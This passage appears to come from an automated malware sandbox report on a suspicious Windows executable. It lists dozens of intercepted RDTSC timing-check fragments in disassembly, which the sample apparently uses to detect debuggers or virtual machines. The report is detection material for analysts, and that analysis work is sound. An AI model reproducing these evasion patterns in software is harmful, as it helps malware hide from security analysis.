                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C80C second address: E9C829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9CC1D second address: E9CC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA453A second address: EA453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA453E second address: EA4561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FCA18C4F6A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA308B second address: EA30A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a jbe 00007FCA18DB50E6h 0x00000010 pop edx 0x00000011 popad 0x00000012 jng 00007FCA18DB50F6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA30A9 second address: EA30AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3649 second address: EA365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50EBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA365C second address: EA3669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCA18C4F696h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F5C second address: EA3F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F64 second address: EA3F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F68 second address: EA3F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F71 second address: EA3F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F7F second address: EA3F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCA18DB50E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4253 second address: EA4257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4257 second address: EA425B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA425B second address: EA4267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA18C4F696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4267 second address: EA426C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAC987 second address: EAC99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA18C4F696h 0x0000000a je 00007FCA18C4F696h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACAF3 second address: EACAFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACF06 second address: EACF1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACF1D second address: EACF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD2C8 second address: EAD2EB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA18C4F696h 0x00000008 jmp 00007FCA18C4F6A9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD2EB second address: EAD311 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA18DB50EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FCA18DB50EFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD311 second address: EAD31F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4B5A second address: EB4B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4B60 second address: EB4B6A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCA18C4F696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4D29 second address: EB4D2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4D2E second address: EB4D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB527A second address: EB5280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5280 second address: EB5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5286 second address: EB52A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA18DB50EFh 0x0000000d jc 00007FCA18DB50E6h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB52A4 second address: EB52A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB52A9 second address: EB52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5463 second address: EB5469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5898 second address: EB58B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCA18DB50F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB58B8 second address: EB58C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB45FC second address: EB461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCA18DB50F8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB461D second address: EB4623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4623 second address: EB464D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 js 00007FCA18DB50E6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA853 second address: EBA86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA86B second address: EBA871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA871 second address: EBA890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FCA18C4F69Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FCA18C4F69Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA890 second address: EBA894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA894 second address: EBA89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA89A second address: EBA8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA8A3 second address: EBA8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FCA18C4F696h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E0D625 second address: E0D636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCA18DB50E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBD5EA second address: EBD61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA18C4F696h 0x0000000a je 00007FCA18C4F696h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCA18C4F6A9h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBD77E second address: EBD78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBD78A second address: EBD7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FCA18C4F6B0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: ECA6FF second address: ECA704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: ECE3A2 second address: ECE3B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA18C4F69Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: ECE0C1 second address: ECE0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA18DB50E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: ED4E6B second address: ED4E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FCA18C4F69Ah 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E0833D second address: E08378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCA18DB50F3h 0x0000000e jmp 00007FCA18DB50F7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E08378 second address: E08393 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCA18C4F6BCh 0x0000000e jng 00007FCA18C4F698h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EDD887 second address: EDD8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50EFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EDD8A2 second address: EDD8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EDD8A7 second address: EDD8B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA18DB50ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE14EC second address: EE14F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE14F2 second address: EE14F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE14F6 second address: EE14FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE648B second address: EE648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE648F second address: EE6493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE6BD6 second address: EE6BF7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA18DB50E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCA18DB50F7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE6BF7 second address: EE6BFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EE6BFC second address: EE6C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA18DB50E6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EEB176 second address: EEB182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA18C4F696h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EEB182 second address: EEB195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 ja 00007FCA18DB50F0h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08A12 second address: F08A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCA18C4F696h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08A1C second address: F08A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08A20 second address: F08A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08A26 second address: F08A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08A2F second address: F08A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08879 second address: F0887D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0887D second address: F08883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F08883 second address: F088A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F088A2 second address: F088A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F088A6 second address: F088AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F088AA second address: F088BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FCA18C4F698h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0A796 second address: F0A7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F1h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0A7AF second address: F0A7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0A7B8 second address: F0A7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0D8B7 second address: F0D8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0D8BB second address: F0D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0D8C6 second address: F0D8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCA18C4F696h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FCA18C4F696h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F0D8D9 second address: F0D8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18DB50E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F21DA8 second address: F21DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F21DAE second address: F21DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F21DB8 second address: F21DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20C3C second address: F20C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20C44 second address: F20C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FCA18C4F69Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20C5C second address: F20C6B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18DB50E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20DBC second address: F20DCE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18C4F698h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20DCE second address: F20DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20DD2 second address: F20DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
